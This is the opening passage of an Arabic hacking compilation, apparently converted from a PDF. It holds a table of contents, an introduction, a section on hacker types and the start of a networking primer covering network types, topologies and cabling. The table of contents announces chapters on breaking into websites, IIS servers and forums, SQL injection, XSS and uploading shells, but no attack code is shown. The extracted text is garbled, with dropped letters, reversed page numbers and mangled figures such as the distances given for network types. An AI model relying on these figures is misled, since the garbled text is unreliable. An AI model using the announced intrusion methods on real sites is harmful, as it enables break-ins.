Page 1

‫مقدمة‪1    7......................................................................................‬‬ ‫قسم الشبكات‪                                                         :‬‬ ‫الھ اكرز والكراكرز‪9...............................................................................‬‬ ‫ملف عن الشبكات‪   11.....................................................................‬‬ ‫خدمة ‪    19...........................................................................Finger‬‬ ‫ماھو ‪    27................................................................................FTP‬‬ ‫ماھو نقل الملفات ‪     30........................................................... ?FTP‬‬ ‫‪  TCP/IP 4 Idiots‬الجزء الول‪    63.......................................................‬‬ ‫‪ TCP/IP 4 Idiots‬جزء الثاني ‪    05.......................................................‬‬ ‫‪  TCP/IP 4 Idiots‬الجزء الثالث‪    16.....................................................‬‬ ‫‪ TCP/IP4 Idiots‬الجزء الرابع‪     76.......................................................‬‬ ‫ماھو‪     76.............................................................................HTTP‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الول) ‪      48................................................‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الثاني) ‪      88..............................................‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الثالث) ‪      29..............................................‬‬ ‫بروتوكول ‪ ) TCP/IP‬الجزء الرابع) ‪     79................................................‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪    401.......................................)-1-‬‬ ‫بروتوكول ‪) TCP/IP‬الجزء الخامس ‪    801.......................................)-2-‬‬ ‫بروتوكول ال ‪ HTTP‬تحت المجھ ر‪    611.................................................‬‬ ‫ماھو ‪     119.............................................................................CGI‬‬ ‫ماھو ‪     121..........................................................Buffer Overflows‬‬ ‫دراسة ‪     126..........................................................................BOF‬‬ ‫‪                                                2‬‬ ‫ماھو ‪  130..................................................................Send Mail‬‬ ‫ماھو ‪  3134.........................................................................POP‬‬ ‫ماھ و التلنت‪  731........................................................................‬‬ ‫ماھو ‪  144..........................................................................DNS‬‬ ‫ماھو ‪  148.............................................................................IP‬‬ ‫بروتوكول الستخدام اللسلكي (‪   153................................... (WAP‬‬ ‫الشبكات اللسلكیة‪   651.............................................................‬‬ ‫برتوكول القشرة المنة‪   181.................................................... ssh‬‬ ‫شرح ‪ Ssl‬الجزء الول‪   281............................................................‬‬ ‫شرح ‪ Ssl‬الجزء الثاني‪481................................................................‬‬ ‫ما ھو بروتوكول ‪    187......................................................... Socks‬‬ ‫توصیل النترنت بنايل سات ‪    091............................................201‬‬ ‫‪                                          3‬‬ ‫قسم الحماية‪                                                            :‬‬ ‫المخاطر المنیة على شبكة الويب والوقاية منھا(‪491.......................... )1‬‬ ‫المخاطر المنیة على شبكة الويب والوقاية منھا(‪691.......................... )2‬‬ ‫السرية في النترنت‪991...................................................................‬‬ ‫ی في النترنت؟‪202.......................................‬‬ ‫ھ ل يمكن أن تتجول متخف ً‬ ‫ا‪                                                             ‬‬ ‫ملف ‪203..........................................................................htaccess‬‬ ‫أساسیات التشفیر‪ 902....................................................................‬‬ ‫ماذا تعرف المواقع التى تزورھ ا عنك؟‪ 312.............................................‬‬ ‫شرح وظیفة ‪ Isa‬لحل كثیر من المشاكل المنیة على الشبكة‪ 612...........‬‬ ‫ماذا يعرف عنك المزود؟‪ 222..............................................................‬‬ ‫ماذا يكشف رقم البي نمبر؟‪ 422.......................................................‬‬ ‫‪ StealthZapper‬لمسح تحركاتك من على السیرفر‪  522..........................‬‬ ‫شرح طريقة استرجاع المنتدى بعد اختراقه بالصور‪  232..........................‬‬


‫كیف تبقى مجھول الھ وية ؟!!‪  832.....................................................‬‬ ‫كیف تبقى مجھول الھ وية ؟!!‪  342.....................................................‬‬ ‫طرق حمايه المنتدى‪  942................................................................‬‬ ‫قسم الختراق‪                                                       :‬‬ ‫‪   257..............................................................anonymous Access‬‬ ‫الختراق عن طريق ال‪   259........................................................FTP‬‬ ‫الختراق عن طريق التلنت‪   362.......................................................‬‬ ‫اختراق المواقع‪   662......................................................................‬‬ ‫كیفیة الختراق (الجزء الول) ‪    972...................................................‬‬ ‫اختراق المواقع (الجزء الثاني) ‪    682.................................................‬‬ ‫اختراق موقع مجاني‪    392..............................................................‬‬ ‫‪    296...........................................................FrontPage Extension‬‬ ‫اختراق المواقع من نوع‪    303...................................... philboard.asp‬‬ ‫تعلم الختراق‪     703......................................................................‬‬ ‫‪                                            4‬‬ ‫اختراق المواقع‪913....................................................................‬‬ ‫الدلیل الكامل لختراق سیرفرات ‪326........................................IIS‬‬ ‫شرح لثغرات ال ‪ php‬المشھ وره مع نموذج عملي‪233.......................‬‬ ‫شرح ثغرة سجل الزوار‪ 043.........................................................‬‬ ‫اختراق الديجي شات احدث الطرق لتخطى الحماية‪443...................‬‬ ‫شرح تخطي مجلد الحمايه للدمن‪ 453.........................................‬‬ ‫السیف مود ما ھ و وكیفیفة تخطیه وكیفیة تفعیله على السیرفر‪ 653..‬‬ ‫‪  360.................................................Exploiting Cisco Systems‬‬ ‫اختراق السیرفرات عن طريق النت كات( ‪  377................... (NetCat‬‬ ‫ماھ و الختراق العشوائي‪  783....................................................‬‬ ‫كیفیة اكتشاف ثغرات الـ‪  391................................. SQL Injection‬‬ ‫تعلم(‪  400............................................................... (phpshell‬‬ ‫طريقة البحث عن الكسبلويتات ‪ +‬أخذ رووت‪  114...........................‬‬ ‫استغلل ثغرات‪  416............................................................ xss‬‬ ‫‪0.1S4ALog v ,,‬لوج خفیف و دون قاعدة بیانات‪  224........................‬‬ ‫اكتشاف ثغره حديثه ‪ Invision Power Board‬من ‪ 3.0.2‬وماتحت‪  524..‬‬ ‫شرح احدى ثغرات الصندوق السحري‪ 824.....................................‬‬ ‫طريقة رفع الشل في منتدي مخترق‪ 534......................................‬‬ ‫شرح ‪ Nuke 7.4 Add Admin‬بالصور‪  834........................................‬‬ ‫كیفیة استغلل ثغرة ‪  443........................................... WebHints‬‬ ‫‪                                      5‬‬ ‫قسم الدوات والمهارات‪                 :‬‬ ‫أساسیات إكتشاف وإستغلل ثغرات أنظمة التشغیل‪844........................‬‬ ‫دراسة موقع الضحیة‪164.................................................................‬‬ ‫اتخلص اكبر قدر ممكن من المعلومات عن الموقع من خلل الدومین‪564...‬‬ ‫‪467.............................................................Remote OS Detection‬‬ ‫أداة ‪ 482................................................................................PHP‬‬ ‫ھل تريد شلااا حقیقیا‪ 884..............................................................‬‬ ‫تعلم كیفیة ترجمة الثغرات بلغة البیرل مع تطبیق عملي‪ 094..................‬‬ ‫ارسال رسالة مزيفة بالتلنت‪  694......................................................‬‬ ‫‪ 503...................................................................Network Sniffing‬‬ ‫شرح تفصیلى للكوكى اديتور‪ 605.....................................................‬‬ ‫شرح برنامج ‪ 511.................................................................nmap‬‬ ‫شرح برنامج ‪ 534.................................... Shadow Security Scanner‬‬ ‫قسم القاموس والمصطلحات‪            :‬‬


‫قاموس‪   835................................................................................‬‬ ‫مصطلحات شائعة‪   865..................................................................‬‬ ‫‪                                           6‬‬ ‫بسم االله الرحمن الرحیم‪                                                   ‬‬ ‫وبعد‪                                             ‬‬ ‫أحمد االله تعالى على إتمام ھذا الكتاب والذي يضم أھم المواضیع في القسام‬ ‫التالیة‪                                                                     ‬‬ ‫‪ -1‬الشبكات‪                                                          ‬‬ ‫‪ -2‬الحماية‪                                                           ‬‬ ‫‪ -3‬إختراق المواقع‪                                                    ‬‬ ‫‪ -4‬أدوات ومھارات‪                                                     ‬‬ ‫‪ -5‬القاموس والمصطلحات المنتشرة‪                                  ‬‬ ‫وتم وضع الكتاب لجمیع المستويات من الصفر حتى الحتراف ‪ ,‬ولم أغفل‪      ‬‬ ‫المواضیع الشیقة أو القديمة الساسیة والتى أعتقد أن يكون لھا نفع للقارئ‪ .‬‬ ‫ونأسف لوجود بعض الخطاء في كتاب المواضیع‪ ,‬وبعض المواضیع لم أجد لھا‪  ‬‬ ‫كاتب‪                                                                     .‬‬ ‫ويعلم االله كم استنفذ ھذا الكتاب مني من جھد ومشقة ولكن كل ما أريده ھو‬ ‫دعوة صالحة في ظھر الغیب لستاذي (‪ (BrUtE HaCk‬رحمه االله وأسكنه‪     ‬‬ ‫م‪                                       .‬‬ ‫فسیح جناته فقد كان عونا لى دائ َ‬ ‫ا‪                                        ‬‬ ‫ودعوة لي بالتوفیق في ھذه الحیاة ‪                                       .‬‬ ‫وأرجوا نشر الكتاب حتى تعم الفائدة ‪,‬واالله من وراء القصد‪                    ‬‬ ‫وأي استفسار أرجوا إرساله على ‪        servex@live.de‬‬ ‫وشكرا‪                                                                   .‬‬ ‫مع تحيات‪                                ‬‬ ‫‪                           mr_Shark96‬‬ ‫وفريق‪                                 ‬‬ ‫‪                           BrUtE HaCk‬‬ ‫‪                                    7‬‬ ‫الھاكرز والكراكرز‪8                             ‬‬ ‫للكاتب‪                                                          mr_shark96 :‬‬ ‫لمن تطلق كلمة ھاكر؟‪                                                       ‬‬ ‫كان في اواخر الستینات تطلق كلمة ھ اكر على المحترفین في البرمجة في‪    ‬‬ ‫لغات ذلك الوقت كالبیزك والفروتران ثم تحولت الى المخترقین والمخربین‪       ‬‬ ‫وجدت شھرة أكبر عند بداية ظھور الفیروسات والديدان‪                         .‬‬ ‫من ھو الھاكر؟‪                                                               ‬‬ ‫شخص له القدرة كذلك على دخول الجھزة المبحرة في عالم النترنت‪           ‬‬ ‫ويستطیع كذلك تأمین الشبكات وحل مشكلت الشبكة له القدرة على البرمجة‬ ‫أو اساسیات البرمجة مثل لغة ‪ C‬أو ‪ PHP‬أو ‪ Perl‬أو ‪                       .ASP‬‬ ‫من ھو الكراكرز؟‪                                                             ‬‬ ‫شخص لديه القدرة على البرمجة ويستطیع اختراق الجھزة للحصول على‪      ‬‬ ‫معلومة سرية أو اختراق مزودات الشركات لضفة او خذف شئ ما وكذلك كسر‬ ‫الشفرات ووفكھ ا وبقدرته على البرمجة يستطیع تطوير أدواته لتناسب كل‪       ‬‬ ‫الظروف‪                                                                      .‬‬ ‫أنواع الھاكرز؟‪                                                                 ‬‬ ‫(‪ – )1‬القبعات البیضاء ‪ :‬ھم الذين يخترقون بأوامر من سلطات‪              .‬‬ ‫(‪ – )2‬القبعات الرمادية ‪ :‬ھم باختصار يؤمنون بحرية المعلومات فھم‪          ‬‬ ‫يخترقون لمعرفة نقاط الضعف أو لمن الشبكات‪                        .‬‬ ‫(‪ – )3‬القبعات الوداء ‪ :‬يخترق اما للحصول على معلومة معینة لتجارتھا أو‪   ‬‬ ‫للحصول على المال‪                                                 .‬‬


‫ھناك أنواع أخرى من الھاكر ‪                                                 :‬‬ ‫(‪ : Phreak – )1‬ھو ھاكر يستطیع التجسس على المھاتفات أو الدخول‪   ‬‬ ‫عن طريق الشبكات الھ اتفیة ويتخدمون تقنیات عالیة وأجھزة كأجھزة‪   ‬‬ ‫التحكم في موجات اصوت‪                                          ...‬‬ ‫(‪ : Cypherpunks – )2‬ھو ھ اكر يستطیع التشفیر إما عن طريق البرامج أو‪ ‬‬ ‫إستخدام خوارزمیات معقدة فمن الصعب جدا فك ذلط التشفبر‪         .‬‬ ‫(‪ : Cyberpunk – )3‬ھو ھ اكر يستطیع استخدام مزيجا من الطرق السابقة‬ ‫وھذا النوع من الھاكر يستطیع القرصنة على القنوات الفضائیة‪          .‬‬ ‫‪                                        9‬‬ ‫( ‪     )4‬‬ ‫– ‪ : Spoofing‬ھذا النوع من الھ اكر يستطیع ارسال رسائل مزيفة‬ ‫فیدعي أنه شركة معینة فیحصل على مايريد (الیوزر نايم والباسوورد)‪.‬‬ ‫( ‪     )5‬‬ ‫– ‪ : IP Spoofing‬ھاكر يستطیع إعطاء ‪ IP‬وھمي لخداع المزودات‬ ‫الخدمة فیصعب تحديد مكان الجھاز‪                                  .‬‬ ‫( ‪    )6‬‬ ‫– ‪  : Web Spoofing‬يستطیع تصمیم موقع مشابه لموقع اخر معین‬ ‫فیخدع المستخدم في ھذا الموقع فیاخذ الھاكر ما يريد‪             .‬‬ ‫( ‪  )7‬‬ ‫– ‪ : Nuking‬وھ ي عمیة ارسال قنابل بريدية أو ارسال نوع من الحزم‬ ‫ألى شبكة عینة فتحدث أضرار‪                                        .‬‬ ‫‪                                      01‬‬ ‫ملف عن الشبكات‪                     ‬‬ ‫للكاتب‪                                                    MariJuana :‬‬ ‫‪                                                                      /‬‬ ‫| ‪ --‬الشبكة‪                                                           ‬‬ ‫| ‪ --‬انواع الشبكات‪                                                     ‬‬ ‫‪                                                   | ­ LAN‬‬ ‫‪                                                  | ­ WAN‬‬ ‫‪                                                  | ­ MAN‬‬ ‫| ‪--‬اھمیة استخدام الشبكات‪                                          ‬‬ ‫| ‪ -‬المشاركة في استخدام البیانات و المعلومات‪    ‬‬ ‫| ‪ -‬المشاركة في استخدام الكونات المادية و البرامج‬ ‫| ‪ --‬طبولوجیا الشبكة‪                                                  ‬‬ ‫النجمیة | ‪ -‬الطبولوجیا‪                                   ‬‬ ‫الحلقیة | ‪ -‬الطبولوجیا‪                                   ‬‬ ‫الخیطیة | ‪ -‬الطبولوجیا‪                                   ‬‬ ‫الھجینة | ‪ -‬الطبولوجیا‪                                   ‬‬ ‫الخـطیة | ‪ -‬الطبولوجیا‪                                   ‬‬ ‫| ‪ --‬انواع كابلت التوصیل‪                                               ‬‬ ‫| ‪ -‬الكابل المحوري‪                                   ‬‬ ‫| ‪ -‬كابل رقیق‪                           ‬‬ ‫| ‪ -‬كابل سمیك‪                         ‬‬ ‫| ‪ -‬الكابل المزدوج الملفوف‪                           ‬‬ ‫| ‪ -‬الكابل المزدوج المجدول‪       ‬‬ ‫| ‪ -‬الكابل المزدوج المعزول‪        ‬‬ ‫| ‪ -‬كابل الياف الضوئیة‪                               ‬‬ ‫| ‪ --‬نقل الشارات الكترونیة‪                                            ‬‬ ‫| ‪ -‬طريقة النقل ذات المدى القاعدي‪               ‬‬ ‫| ‪ -‬طريقة النقل ذات المدى الواسع‪                 ‬‬ ‫‪                                11‬‬ ‫الشبكة ( ‪                                                       ( Network‬‬ ‫الشبكة ھ ي نظام اتصالت يقوم بربط عدة حواسیب والتجھیزات الطرفیة‪       ‬‬ ‫المرافقة بعضھا ببعض بصورة مشابھة نوعا م للشبكة الھاتفیة بھدف تقديم‪    ‬‬


‫الخدمات الحاسوبیة المختلفة للمثتثمرين ‪                                  .‬‬ ‫كلمة شبكة ( ‪  ( Network‬تشیر إلى أثنین أو أكثر من أجھزة الحاسب متصلین‪ ‬‬ ‫معا ‪ .‬وھناك عدة أسباب لربط أجھزة الحاسب فى شبكة أھمھا ما يلي ‪      :‬‬ ‫· اتصال أجھزة الحاسب يسمح باتصال الشخاص ونقل‪              ‬‬ ‫المعلومات‪                                                            .‬‬ ‫· اتصال أجھ زة الحاسب يسمح بمشاركة موارد الحاسب‪            .‬‬ ‫ھناك ثلث انواع شبكات الحاسب ‪                                          :‬‬ ‫الشبكات المحلیة ( ‪                                ( Local Area Networks‬‬ ‫وتختصر ( ‪  ( LAN‬وفیه يتم ربط الحاسبات بطريقة مباشرة باستخدام نوع معین‬ ‫من الكابلت ‪ ,‬وھي شبكة بین عدة اجھ زه لتذيد المسافة بینھا عن ‪5.2‬كم و‪ ‬‬ ‫تستخدم في المؤسسات و الشركات فیمكن ربط الجھزة و الطابعات ‪..‬و ھو‪   ‬‬ ‫من اكثر الشبكات انتشارا و استخداما ‪                                     .‬‬ ‫الشبكة الواسعة ( ‪                                  (Wide Area Networks‬‬ ‫وتختصر ( ‪ ( WAN‬وھ و ينتج عادة من ربط عدة شبكات محلیة ببعضھا من خلل‪ ‬‬ ‫خطوط التلیفون أو بواسطة القمر الصناعي أو المیكروويف ‪ ,‬و ھي شبكة كبیره‪ ‬‬ ‫يمكنھا ربط اجھزه على مسافه ‪05‬كم ‪,‬و تعتبر العمود الفقري لشبكة النترنت‬ ‫حیث انھا تستطیع ربط شبكات محلیة مع بعضھا مما يمكنھ ا لتغطیة مدينة او‪  ‬‬ ‫دولة ‪                                                                    ..‬‬ ‫شبكات المدن ( ‪                            ( Metropolitan Area Networks‬‬ ‫وتختصر الى ً) ً‪ ( WAN‬و ھي شبكة بین حاسبات عديدة اقصى مسافة لھا ‪53‬‬ ‫كم و يمكن لھ ا ربط فروع شركة او شبكة بین حواسیب شارع معین ‪         ..‬‬ ‫اھمیة استخدام الشبكات‪                                                   ‬‬ ‫‪ -1‬المشاركة في استخدام البیانات و المعلومات ‪                           .‬‬ ‫‪                                    21‬‬ ‫‪ -2‬المشاركة في استخدام الكونات المادية و البرامج ‪                           .‬‬ ‫‪ -1‬المشاركة في استخدام البیانات و المعلومات ‪                              -:‬‬ ‫حیث يكون من اسھ ل تبادل البیانات بعد تشبیك الجھ زة بدل من استخدام‪    ‬‬ ‫الديسكات في ذلك ‪ ,‬فیمكن لي شخص على الشبكة ان يسحب ملف معین و‬ ‫مجلد كامل ‪ -‬و قد تكون سمحت له بذلك‪ -‬فالشبكه تسھل تبادل البیانات كما‪ ‬‬ ‫لو انك تتعامل مع جھاز واحد فیتم تبادل البیانات بسھوله و سرعة ‪            .‬‬ ‫‪ -2‬المشاركة في استخدام الكونات المادية و البرامج ‪                           .‬‬ ‫وھ ي من اعظم فائد الشبكة ‪ ,‬فیمكن ليشخص على الشبكة ان يستخدم‪  ‬‬ ‫مثل الطابعة التي موجوده على جھاز اخر على نفس الشبكة‪                  ‬‬ ‫ويمكننا ان نقول ان الشبكات تنقسم لقسمین ‪                                -:‬‬ ‫‪ -1‬شبكات الند للند ‪                                               Peer­To­Peer‬‬ ‫‪ -2‬شبكات الخوادم ‪                                                Server­Based‬‬ ‫‪ -1‬شبكات الند للند ‪                                               Peer­To­Peer‬‬ ‫من المعروف دائما ان في جمیع الشبكات يوجد بما يسمى الخادم ‪     Server‬‬ ‫ولكن في ھ ذا النوع من الشبكات ل يوجد خادم و بالتالي فان جمیع الجھزة‪   ‬‬ ‫تكون متساوية فكل مستخدم مسؤل عن جھازة ( البیانات المتاحة ‪ -‬مستوى‪  ‬‬ ‫التأمین ‪ ) ..‬و يعرف كل جھاز من الجھزة المتصلة بالشبكة بالند ‪              .‬‬ ‫وتعرف ھذه الشبكات ايضا باسم ‪ Work groups‬حیث ان ھذا النوع من‪         ‬‬ ‫الشبكات يمثل مجموعة عمل صغیرة فجب ان تكون الجھزة المكونة للشبكة‪  ‬‬ ‫حوالي ‪ 01‬اجھزة او اقل ‪ ,‬و من ھنا نستطیع ا نقول ان تكلفة ھذه الشبكات‪   ‬‬ ‫قلیله اذا ما قورنت بالنوع الخر ( ل حاجة لوجود خوادم ‪                    . ) ..‬‬ ‫‪ -2‬شبكات الخوادم ‪                                                Server­Based‬‬ ‫وھ ذا النوع من الشبكات يحتاج لوجود خادم قوي والذي يكون بمثل مدير‪       ‬‬ ‫للشبكة و الذي يستطیع التحكم فیھ ا ‪ .‬ومن احد ممیزات ھذا النوع من‪         ‬‬ ‫الشبكات ھو مستوى تأمینھا العالي ‪ ,‬و احدى الممیزات الخرى ھي امكانیة‪  ‬‬ ‫التحكم في النظام بحیث يقوم بعمل نسخة احتیاطیة تلقائیا كل مدة يحددھا‪  ‬‬


‫صاحب السرفر ‪.‬و ھ ذه الشبكة يمكن ان تتكون من مئات المستخدمین لھا‪     ‬‬ ‫فتعتبر مكافة اكثر من شبكات الند للند ‪                                          .‬‬ ‫‪                                         31‬‬ ‫طبولوجیا الشبكة ‪                                           Network Toplogy‬‬ ‫ونقصد بطبلوجیا الشبكة ھ و تحديد المكونات المادية لھا و يمكن تقسیم‪         ‬‬ ‫طبولزجیا الشبكات الى ما يأتي ‪                                               -:‬‬ ‫‪ -1‬الطبولوجیا النجمیة ‪                                          Star Toplogy‬‬ ‫‪ -2‬الطبولوجیا الحلقیة ‪                                           Ring Toplogy‬‬ ‫‪ -3‬الطبولوجیا الخیطیة ‪                                         Mesh Toplogy‬‬ ‫‪ -4‬الطبولوجیا الھجینة ‪                                        Hybrid Toplogy‬‬ ‫‪ -5‬الطبولوجیا الخطیة ‪                                          Bus Topology‬‬ ‫‪ -1‬الطبولوجیا النجمیة ‪                                          Star Toplogy‬‬ ‫وھ ي احد طرق الشبیك القديمة و التي يم فیھا توصیل كل الجھزة ‪    Clients‬‬ ‫المكونة للشبكة بالخادم الرئیسي ‪ Server‬وھ ي ال ابسط الشبكات و تتمیز‪    ‬‬ ‫بسھ ولة اضافة او ازالة اي شخص نت الشبكة دون التأثیر على ادائھا و لكن من‬ ‫لحد العیوب الرئیسیة بھا ھ و انه عند حدوث اي خلل في الخادم ‪        Server‬‬ ‫يؤدي الى انھیار الشبكة بأكملھا ‪                                               .‬‬ ‫ولكن قد تم تطوير طريقة وصل الجھ زة بالخادم فاصبحت تكون متصلة بما يعرف‪ ‬‬ ‫ب ‪ Hub‬فلو حدث اي عطل في احد الجھزة التي على الشبكة ‪ -‬الكابل ‪      ..‬‬ ‫فسیتوقف عمل الجھ از على انه جزء من الشبكة ولكن سوف يستمر عمل‪     ‬‬ ‫الشبكة ‪                                                                       .‬‬ ‫‪ -2‬الطبولوجیا الحلقیة ‪                                           Ring Toplogy‬‬ ‫و تكون الجھ زة المكونة للشبكة على شكل حلقة ( دائرة ) فیتم وصل كل جھاز‬ ‫بالجھاز الذي يلیه فیتم وصل الجھاز الول و الخیر بالخادم ‪             . Server‬‬ ‫ويم وصل الجھ زة بكابل دائري واحد ‪ ,‬و عند حدوث اي عطل في جھاز على‪    ‬‬ ‫شبكة يؤثر على اداء الشبكة كلھا ‪                                             .‬‬ ‫وتنتقل البیانات في ھ ذه الشبكة بطرقة تعرف بال ‪ Token Passing‬و ‪Token‬ھو‬ ‫عبارة عن سلسلة من ال ‪ , Bits‬ويتحرك ال ‪ Token‬في اتجاة واحد فقط بعني‪  ‬‬ ‫اذا كانت ال ‪ Token‬بمشي في اتجاه الجھاز الذي على يمینه و يوجد جھاز‪    ‬‬ ‫على يسار ھذا الجھاز من المفترض وصول ال ‪ Token‬الیه‪                      ‬‬ ‫ل بتجه الى الیسار بل بدور في كل الشبكة حتى يصل الى ھذا الجھاز‪         .‬‬ ‫ويتم تبادل البیانات عن طلريق ان الجھاز الرسل يقوم بوضع مثل بريد الكتروني‪  ‬‬ ‫على البیانات المرسله و يقوم ارسالھا و حتى تصل الى الجھاز و تطابق معه‪   ‬‬ ‫البريد الكتروني المرفق مع البیانات ‪ .‬و من ثم يرسب الجھاز المسقبل الى‪    ‬‬ ‫الراسل رسالة تدل على استقابلة للبیانات ‪                                   .‬‬ ‫‪                                      41‬‬ ‫‪ -3‬الطبولوجیا الشبكیة ‪                                          Mesh Toplogy‬‬ ‫وفیھا يتم ربط الجمیع اجھزة ببعضھ ا عبر عدة كابلت بحیث يمكن استمرار عمل‬ ‫الشبكة عند حدوث اي عطل في اي جزء فیھا فعند حدوث خلل في اي كابل‪   ‬‬ ‫يتم ارسال البیانات عبر كابل اخر ‪ ,‬ولذلك فانھا مكلفة الى حد ما وذلك‪          ‬‬ ‫لستخدام عدد كبیر من الكبلت ‪                                               .‬‬ ‫‪ -4‬الطبولوجیا الھجینة ‪                                        Hybrid Toplogy‬‬ ‫ويعتبر ھ ذا النوع من الشبكات مزيج او خلیط نوعین او اكثر من النواع الربعة‪   ‬‬ ‫الخرى ( باستثناء ‪ ( Mesh Topolgy‬و يتم ذلك عن طريق وصل عدد من ال‪   ‬‬ ‫‪Hubs‬المكون للشبكات الخرى لتكوين ھذه الشبكة ‪                        .‬‬ ‫‪ -5‬الطبولوجیا الخطیة ‪                                           Bus Topology‬‬ ‫ويتم توصیل الجھ زة في شكل خط مستقیم بكابل واحد يطلق علیه ‪Trunk -‬‬ ‫‪ Segment ­ Backbon‬ويتم ارسال البیانات التي تكون على الشبكة تكون‪    ‬‬ ‫على شكل اشارات الكترونیة ‪ ,‬فعد ارسال مثل ملف الى جھاز يتم ارساله‪    ‬‬ ‫الى جمیع الجھزة التي على الشبكة على ھیئة اشارات الكترونیة معھا‪     ‬‬


‫عنوان الجھلز مشفر ول يستقبل ھذا الملف ال الجھاز الذي يتطابق مع العنوان‬ ‫المشفر ‪                                                                    .‬‬ ‫ولذلك ليمكن لكثر من جھاز ارسال واستقبال البیانات مما يؤثر على سرعة‪  ‬‬ ‫واداء الشبكة ‪                                                               .‬‬ ‫انواع كابلت التوصیل‪                                                          ‬‬ ‫من اھ م مكونات الشبكة المادية ھي كبلت التوصیل بین الجھزه و التي يتم‪ ‬‬ ‫انتقال الشارات اللكرونیة فیھا بین الجھ زة المكونة للشبكة ‪ ,‬و يوجد اللف‪  ‬‬ ‫النوع من الكبلت حیث يمكنك اختیار الكبلت المناسبة لك حسب حجم‪      ‬‬ ‫الشبكة التي تريدھا و المتطلبات المختلفة ‪                                 ..‬‬ ‫ويمكننا تقسیم انواع الكابلت الى ‪ 3‬انواع رئیسیة ‪                          -:‬‬ ‫‪ -1‬الكابل المحوري ‪                                           . Coaxial Cable‬‬ ‫‪ -2‬الكابل المزدوج الملفوف ‪                             . Twisted­Pair Cable‬‬ ‫‪ -3‬كابل الياف الضوئیة ‪                                    .Fiber­Optic Cable‬‬ ‫‪ -1‬الكابل المحوري ‪                                           . Coaxial Cable‬‬ ‫‪                                        51‬‬ ‫وھ و من اكثر انواع الكابلت تداول و يرجع ذلك الى ممیزاته العديدة مثل انه غیر‬ ‫مكلف فھو مناسب للشبكات الصغیرة كما انه سھل التعامل معه عند تركیبه ‪ ,‬‬ ‫ويتكون ھ ذا الكابل من شئ شبیه بانبوبة غیر مفرغة ‪ -‬او سلك ‪ -‬من النحاس‬ ‫و حولھا مادة عازلة و اخیرا غلف خارجي وفائدة العازل ھو حماية البینات التي‬ ‫تنتقل عبر الشبكة من التشويش و الذي ينتج من وجود اشارات الكتورنیة‪      ‬‬ ‫مشتته والتي تمنع انتقال الشارات عبر الشبكة ‪                            .‬‬ ‫وبعد توضیع اجزاء السلك سوفف نعرف فوائدھا فسلك النحاسي ھو المسؤل‪  ‬‬ ‫عن تنقل الشارات الكترونیه و العازل فائدة حماية الشارات اللكترونیة كما‪    ‬‬ ‫ذكرنا من قبل ‪ ,‬واحدى ممیزات ھذا النوع من الكابلت ھو مقاومة التشويش ‪ .‬‬ ‫انواع الكابلت المحورية ‪                                                   -:‬‬ ‫أ‪ -‬كابل رقیق ‪                                                      Thinnrt‬‬ ‫ب‪ -‬كابل سمیك ‪                                                   Thicknet‬‬ ‫أ‪ -‬كابل رقیق ‪                                                      Thinnrt‬‬ ‫ھو احد انواع الكابلت المحورية و يتمیز بمرونته و خفة وزنه و سمكه الصغیر ‪  -‬‬ ‫حوالي ‪ .06‬سـم و يمكنھا التصويل بین اجھزه اقصى بعد بینھا ھو ‪ 081‬متر‪    ‬‬ ‫تقريبا و بعدھا تضعف الشارات اللكترونیة ‪                                  .‬‬ ‫ب‪ -‬كابل سمیك ‪                                                  Thicknet‬‬ ‫ھ و احد انواع الكابلت المحورية ايضا وكما يظھ ر من اسمه ان الكابل نفسه‪     ‬‬ ‫سمیك و اكثر صلبة من النوع الخر و نتیجة لسمك الكابل السلك النحاسي‪   ‬‬ ‫اصبح اكثر سمكا و كنتیحه ايضا لذلك اصبح يمكنه توصیل الشارات اللتكورنیة‪ ‬‬ ‫لمسافة اطول ‪ -‬تصل الى نصف كیلو متر –‪                                   ‬‬ ‫‪ -2‬الكابل المزدوج الملفوف ‪                              Twisted­Pair Cable‬‬ ‫ويتكون ھ ذا النوع من الكابلت في ابسط اشكاله من مجموعتین من السلك‪ ‬‬ ‫النحاسیة معزول كل منھم عن الخر و ملتف كل منھ م حول الخر ‪ ,‬فیتم جمع‬ ‫عدد من السلك ووضعھ ا داخل الغلف لتكوين الكابل ويوجد نوعین من ھذه‪   ‬‬ ‫الكابلت ھما ‪                                                             -:‬‬ ‫ا‪ -‬الكابل المزدوج المجدول ( ‪                . UTP (Unshielded Twisted­pair‬‬ ‫ب‪ -‬الكابل المزدوج المعزول ( ‪                     STP (Shilded Twisted­Pair‬‬ ‫ا‪ -‬الكابل المزدوج المجدول ( ‪                . UTP (Unshielded Twisted­pair‬‬ ‫‪                                      61‬‬ ‫وھ و من اكثر انواع الكابلت انتشارا ويستخدم بشكل كبیر في الشبكات‪       ‬‬ ‫المحلیة ( ‪  ( LAN‬و يتكون من نوعین من السلك النحاسیة الملتفین حول‪    ‬‬ ‫يعضھم و يتوقف عدد ھذه التففات على الغرض الذي سوف يتم اسخدامه‪    ‬‬ ‫فیه و لكن من عیوبه الكبیره ھي خاصیة التداخل ‪                           .‬‬ ‫التداخل ‪ :‬ھ و تداخل اشارات من كابل مع اشارات الكابل الخر ‪               .‬‬


‫‪                    STP (Shilded Twisted­Pair‬‬ ‫‪S‬‬ ‫ب‪ -‬الكابل المزدوج المعزول (‬ ‫النحاسي‪   ‬‬ ‫ي‬ ‫ويتكون من مجموعتین من السلك المجدولة و يتمیز بان غطاءه‬ ‫ى‪      ‬‬ ‫افضل من نظیره في ‪ , UTP‬ال ان ھذا النواع من الكابلت ل يقتصر على‬ ‫الكابلت فقط للتشبیك بل يستدعي المر الى استخدام بعض الجھزة الخرى‬ ‫ى‬ ‫‪                                                                          .‬‬ ‫‪                                   Fiber­Optic Cable‬‬ ‫‪F‬‬ ‫‪ -3‬كابل اللیاف الضوئیة‬ ‫وھ ذا النوع يختلف تماما عن النوعین الخرين حیث ان البیانات تنتقل فیه على‬ ‫ى‬ ‫من‪ ‬‬ ‫ھیئة نبضات الكتروينه ويتمیز بسرعه نقل البیانات و صعوبة سرقة البیانات ن‬ ‫قالب‪   ‬‬ ‫خلله ‪.‬و يتكون ھذا الكابل من عدة اجزاء ھي ( من الداخل للخارج ) ‪ :‬ب‬ ‫فیتكون‪ ‬‬ ‫ن‬ ‫من الزجاج ‪ -‬طبقة من البلسیتك ( او الزجاج ) ‪ -‬طبقة حماية اخیره ‪,‬‬ ‫اي كابل من مجموعتین من اللیاف الضوئیة مجموعة خاصة بالستقبال وو‪     ‬‬ ‫الخرى 